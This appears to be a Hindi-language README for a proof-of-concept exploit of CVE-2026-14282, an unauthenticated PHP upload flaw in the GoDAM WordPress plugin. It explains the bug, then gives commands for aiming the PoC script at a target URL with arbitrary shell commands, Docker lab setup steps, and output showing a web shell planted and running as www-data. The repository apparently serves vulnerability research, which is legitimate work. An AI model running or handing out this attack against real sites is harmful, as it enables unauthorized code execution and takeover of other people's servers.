
GoDAM WordPress प्लगइन <= 1.12.2 बिना प्रमाणीकरण के फ़ाइल अपलोड RCE (CVE-2026-14282)
लेखक: nullwhisper
उपयोग: केवल अधिकृत सुरक्षा अनुसंधान / भेद्यता सत्यापन हेतु।
GoDAM WordPress प्लगइन संस्करण <= 1.12.2 में एक WPForms फ़ील्ड godam_record पंजीकृत होती है। अपलोड हैंडलर save_video_file() सार्वजनिक wpforms_process_before_filter एक्शन से जुड़ा होता है, इसलिए यह किसी भी प्रमाणीकरण जाँच से पहले चलता है। हैंडलर हमलावर-नियंत्रित Content-Type हेडर पर भरोसा करता है, जब तक MIME प्रकार video/ से शुरू होता है तब तक PHP फ़ाइल स्वीकार करता है, और उसे वेब पर उपलब्ध निर्देशिका wp-content/uploads/godam/wpforms/ में ले जाता है। यह एक बिना प्रमाणीकरण वाले हमलावर को मनमाना PHP कोड अपलोड और निष्पादित करने की अनुमति देता है।
.
├── cve_2026_14282_poc.py # Main PoC
├── lab/
│ ├── docker-compose.yml # WordPress lab
│ └── setup.php # Creates a WPForms form with GoDAM field
├── requirements.txt
└── README.md
pip3 install -r requirements.txt
python3 cve_2026_14282_poc.py -u https://target.com/page-with-form
स्क्रिप्ट WPForms फ़ॉर्म ID और GoDAM फ़ील्ड ID का स्वतः पता लगाती है। यदि पेज में कई फ़ॉर्म हों या पहचान विफल हो, तो उपयोग करें:
python3 cve_2026_14282_poc.py -u https://target.com/page-with-form \
--form-id 4 --field-id 1 --cmd "whoami"
कमजोर प्लगइन डाउनलोड करें (बाइनरी को पुनर्वितरित न करें):
mkdir -p lab/wpforms-lite lab/godam
cd lab/wpforms-lite
wget https://downloads.wordpress.org/plugin/wpforms-lite.latest-stable.zip
unzip wpforms-lite.latest-stable.zip
rm wpforms-lite.latest-stable.zip
cd ../godam
wget https://downloads.wordpress.org/plugin/godam.1.12.2.zip
unzip godam.1.12.2.zip
rm godam.1.12.2.zip
cd ../..
लैब शुरू करें:
cd lab
docker compose up -d
WordPress इंस्टॉलर को http://127.0.0.1:8092 पर पूरा करें।
प्लगइन इंस्टॉल और सक्रिय करें, फिर फ़ॉर्म और टेस्ट पेज बनाएँ:
docker exec -i lab-wpcli-1 wp plugin activate wpforms-lite --allow-root
docker exec -i lab-wpcli-1 wp plugin activate godam --allow-root
docker exec -i lab-wpcli-1 php /tmp/setup.php
PoC चलाएँ:
python3 cve_2026_14282_poc.py -u 'http://127.0.0.1:8092/?page_id=7' --cmd 'echo PWNED'
WordPress 6.8 + WPForms Lite नवीनतम + GoDAM 1.12.2 पर परीक्षण किया गया।
[*] Detecting WPForms form and GoDAM field...
[*] Found form ID 4, GoDAM field(s): 1
[*] Trying upload via field 1...
[+] Shell uploaded and executed: http://127.0.0.1:8092/wp-content/uploads/godam/wpforms/godam-shell.php
[+] Output: GODAM-RCE-Linux ... uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Command output:
GODAM-RCE-Linux ... PWNED
इस रिपॉजिटरी में केवल PoC और लैब ऑर्केस्ट्रेशन फ़ाइलें हैं। कमजोर प्लगइन बाइनरी को ब्लोट और वितरण संबंधी समस्याओं से बचने के लिए बाहर रखा गया है। अपनी खुद की लैब के लिए WordPress.org से विशिष्ट कमजोर संस्करण डाउनलोड करें।
यह टूल केवल अधिकृत सुरक्षा परीक्षण और अनुसंधान के लिए है। इसे उन सिस्टम पर उपयोग न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है। लेखक इस कोड के दुरुपयोग या क्षति के लिए उत्तरदायी नहीं है।